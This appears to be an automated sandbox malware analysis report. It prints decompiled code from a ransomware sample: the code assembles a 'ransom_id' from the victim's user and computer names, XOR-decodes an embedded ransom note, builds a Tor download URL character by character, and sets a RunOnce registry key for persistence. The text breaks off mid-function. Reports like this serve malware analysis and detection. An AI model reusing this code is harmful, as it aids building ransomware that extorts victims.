					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

APIs

lstrcatW.KERNEL32(?,?), ref: 0F5870C1
lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F5870C9
lstrcatW.KERNEL32(?,?), ref: 0F5870D2
lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F5870DA
lstrcatW.KERNEL32(?,?), ref: 0F5870E5
lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F5870ED
lstrcatW.KERNEL32(?,?), ref: 0F5870F3
lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F5870FB
lstrcatW.KERNEL32(?,?), ref: 0F587107
lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F58710F
lstrcatW.KERNEL32(?,?), ref: 0F587115
lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F58711D
lstrcatW.KERNEL32(?,?), ref: 0F587129
lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F587131
lstrcatW.KERNEL32(?,?), ref: 0F587137
lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F58713F
lstrcatW.KERNEL32(?,?), ref: 0F58714B
lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F587153
lstrcatW.KERNEL32(?,?), ref: 0F587159
lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F587161
lstrcatW.KERNEL32(?,?), ref: 0F58716D
lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F587175
lstrcatW.KERNEL32(?,?), ref: 0F58717B
lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F587183
lstrcatW.KERNEL32(?,0F584B36), ref: 0F58718F
lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F587197
lstrcatW.KERNEL32(?,?), ref: 0F58719D
lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F5871A5
lstrcatW.KERNEL32(?,?), ref: 0F5871B1
lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F5871B9
lstrcatW.KERNEL32(?,?), ref: 0F5871BF
lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F5871C7
lstrcatW.KERNEL32(?,?), ref: 0F5871D3
lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F5871DB
lstrcatW.KERNEL32(?,?), ref: 0F5871E1
lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F5871E9
VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F584869,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F5871FC
wsprintfW.USER32 ref: 0F587216
wsprintfW.USER32 ref: 0F587227
lstrcatW.KERNEL32(?,?), ref: 0F587234
lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F58723C
lstrcatW.KERNEL32(?,?), ref: 0F587242
lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F58724A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F587256
lstrcatW.KERNEL32(?,?), ref: 0F587266
lstrcatW.KERNEL32(?,0F58FFD0), ref: 0F58726E
lstrcatW.KERNEL32(?,?), ref: 0F587274
lstrcatW.KERNEL32(?,0F58FFD4), ref: 0F58727C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F584869,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58727F

Strings

undefined, xrefs: 0F587221
%x%x, xrefs: 0F587210

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 0cd3b4391d2c63211192b1c7f79840fa49f60f827fb5d8bd0323d603519b30f8
Instruction ID: 8217b8ec7758a150832e117d2c903c6ddb9c34be0b0b9604d55fddecea25f80f
Opcode Fuzzy Hash: 0cd3b4391d2c63211192b1c7f79840fa49f60f827fb5d8bd0323d603519b30f8
Instruction Fuzzy Hash: D6510B31146658B6DB273B618C49FEF3F59FF8A700F060060F9103845A8B699253EFEA

Uniqueness

Uniqueness Score: -1.00%

Function 0F5842B0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0F5842B0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xf592a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0F583BC0( &_v148);
				E0F587490( &_v236, __edx); // executed
				_t97 = E0F5872A0( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0F5870A0( &_v152, _t98); // executed
				_t60 = E0F5881F0(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xf590510]");
				_t77 = 0xf592000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xf592000) =  *(_t62 + 0xf592000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xf592a64 = 0xf592000;
				_t94 = E0F5881F0(0xf592000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xf592a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
						 *0xf592a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000); // executed
					_t54 = E0F587D70( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xf592000;
					_t69 =  *0xf592000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xf592000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

APIs

Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C

Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0F5874B7
Part of subcall function 0F587490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F5874C8
Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0F5874E6
Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F587510
Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F58756E
Part of subcall function 0F587490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
Part of subcall function 0F587490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
Part of subcall function 0F587490: RegCloseKey.KERNELBASE(00000000), ref: 0F5875D2

Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584321
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584363
lstrcpyW.KERNEL32 ref: 0F5843E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F5843E9

Strings

d, xrefs: 0F5844E5
a, xrefs: 0F584505
/, xrefs: 0F584475
l, xrefs: 0F5844FD
t, xrefs: 0F58448D
w, xrefs: 0F58447D
h, xrefs: 0F58445D
., xrefs: 0F584535
/, xrefs: 0F5844C5
w, xrefs: 0F584485
s, xrefs: 0F58446D
m, xrefs: 0F58452D
n, xrefs: 0F5844D5
h, xrefs: 0F584525
t, xrefs: 0F584465
r, xrefs: 0F58449D
{USERID}, xrefs: 0F5843BF, 0F58440D, 0F584413
o, xrefs: 0F5844CD
ransom_id=, xrefs: 0F584350, 0F58435C
n, xrefs: 0F58453D
r, xrefs: 0F584495
j, xrefs: 0F5844A5
-, xrefs: 0F58450D
d, xrefs: 0F5844ED
a, xrefs: 0F584515
y, xrefs: 0F58451D
o, xrefs: 0F5844DD
c, xrefs: 0F5844AD
., xrefs: 0F5844B5
r, xrefs: 0F5844BD
w, xrefs: 0F5844F5

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
Opcode ID: 432544a892d25b4be73940f56c19447610758be2069dd28a78988cd64a069953
Instruction ID: 915bb084315fbe07fc589522136c87c40f4af6723162c7fd71625b339812ff7c
Opcode Fuzzy Hash: 432544a892d25b4be73940f56c19447610758be2069dd28a78988cd64a069953
Instruction Fuzzy Hash: 4B710470504341DBE724EF10D80976B7FE1FB80758F50492CFA856B2A2EBF9954ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 0F5843A6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F5843A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xf592000) =  *(_t41 + 0xf592000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xf592a64 = 0xf592000;
				_t60 = E0F5881F0(0xf592000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xf592000;
						_t49 =  *0xf592000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xf592000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xf592a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
					 *0xf592a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000); // executed
				_t44 = E0F587D70( &_a136);
				return _t44;
			}

APIs

lstrcpyW.KERNEL32 ref: 0F5843E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F5843E9
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0F584555
wsprintfW.USER32 ref: 0F58456F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0F584586

Strings

d, xrefs: 0F5844E5
a, xrefs: 0F584505
l, xrefs: 0F5844FD
/, xrefs: 0F584475
t, xrefs: 0F58448D
w, xrefs: 0F58447D
h, xrefs: 0F58445D
., xrefs: 0F584535
/, xrefs: 0F5844C5
w, xrefs: 0F584485
s, xrefs: 0F58446D
m, xrefs: 0F58452D
n, xrefs: 0F5844D5
h, xrefs: 0F584525
t, xrefs: 0F584465
r, xrefs: 0F58449D
{USERID}, xrefs: 0F5843BF, 0F58440D, 0F584413
o, xrefs: 0F5844CD
n, xrefs: 0F58453D
r, xrefs: 0F584495
j, xrefs: 0F5844A5
-, xrefs: 0F58450D
d, xrefs: 0F5844ED
a, xrefs: 0F584515
y, xrefs: 0F58451D
o, xrefs: 0F5844DD
c, xrefs: 0F5844AD
., xrefs: 0F5844B5
w, xrefs: 0F5844F5
r, xrefs: 0F5844BD

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: cd9fbc8736e4a6bb610ac8dcb7ce18b7454ce6593b025f8965148a857e689544
Instruction ID: 0d40faeccb505d06215e6cf63961f3fbd80ded84db50686b87d8619f31c442a3
Opcode Fuzzy Hash: cd9fbc8736e4a6bb610ac8dcb7ce18b7454ce6593b025f8965148a857e689544
Instruction Fuzzy Hash: B441A270509341DBD724EF10D54832ABFE2FB80759F50492CFA886B262D7FA859ACF52

Uniqueness

Uniqueness Score: -1.00%

Function 0F582960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0F582960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0F5882B0( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

APIs

lstrlenW.KERNEL32(00520050,00000041,772D82B0,00000000), ref: 0F58299D

Part of subcall function 0F5882B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
Part of subcall function 0F5882B0: VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0F5882FB
Part of subcall function 0F5882B0: GetModuleHandleA.KERNEL32(?), ref: 0F58834F
Part of subcall function 0F5882B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
Part of subcall function 0F5882B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
Part of subcall function 0F5882B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
Part of subcall function 0F5882B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3

RegCreateKeyExW.KERNELBASE(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F582C45,00000000), ref: 0F582A84
lstrlenW.KERNEL32(00000000), ref: 0F582A8F
RegSetValueExW.KERNELBASE(0F582C45,00520050,00000000,00000001,00000000,00000000), ref: 0F582AA4
RegCloseKey.KERNELBASE(0F582C45), ref: 0F582AB1

Strings

F, xrefs: 0F5829BD
\, xrefs: 0F5829EB
i, xrefs: 0F582A5A
f, xrefs: 0F582A0D
\, xrefs: 0F582A30
u, xrefs: 0F582A37
n, xrefs: 0F582A6F
A, xrefs: 0F58298C
r, xrefs: 0F582A3E
n, xrefs: 0F582A61
r, xrefs: 0F5829FF
w, xrefs: 0F582A29
W, xrefs: 0F5829C7
S, xrefs: 0F5829B0
I, xrefs: 0F582979
n, xrefs: 0F582A76
H, xrefs: 0F582993
d, xrefs: 0F582A22
i, xrefs: 0F5829F8
P, xrefs: 0F58296D
e, xrefs: 0F582A7D
U, xrefs: 0F582984
R, xrefs: 0F5829CE
s, xrefs: 0F582A06
r, xrefs: 0F582A53
i, xrefs: 0F582A1B
R, xrefs: 0F582A68
V, xrefs: 0F582A4C
\, xrefs: 0F582A14
n, xrefs: 0F582A45

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: 3b3f2971afce78b4317862d047c3f8e00acbc6d995383461f027ecabc2b9d2fb
Instruction ID: 078393bbf2970ad8433ee405127a8ced7b1603c5e7f52df8b3d54107fc9dd902
Opcode Fuzzy Hash: 3b3f2971afce78b4317862d047c3f8e00acbc6d995383461f027ecabc2b9d2fb
Instruction Fuzzy Hash: DA31D9B090021DEFEB20CF91E948BEDBFB9FB01709F508119D6187A281D7BA49499F95

Uniqueness

Uniqueness Score: -1.00%

Function 0F582D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0F582D30() {
				struct _WNDCLASSEXW _v52;
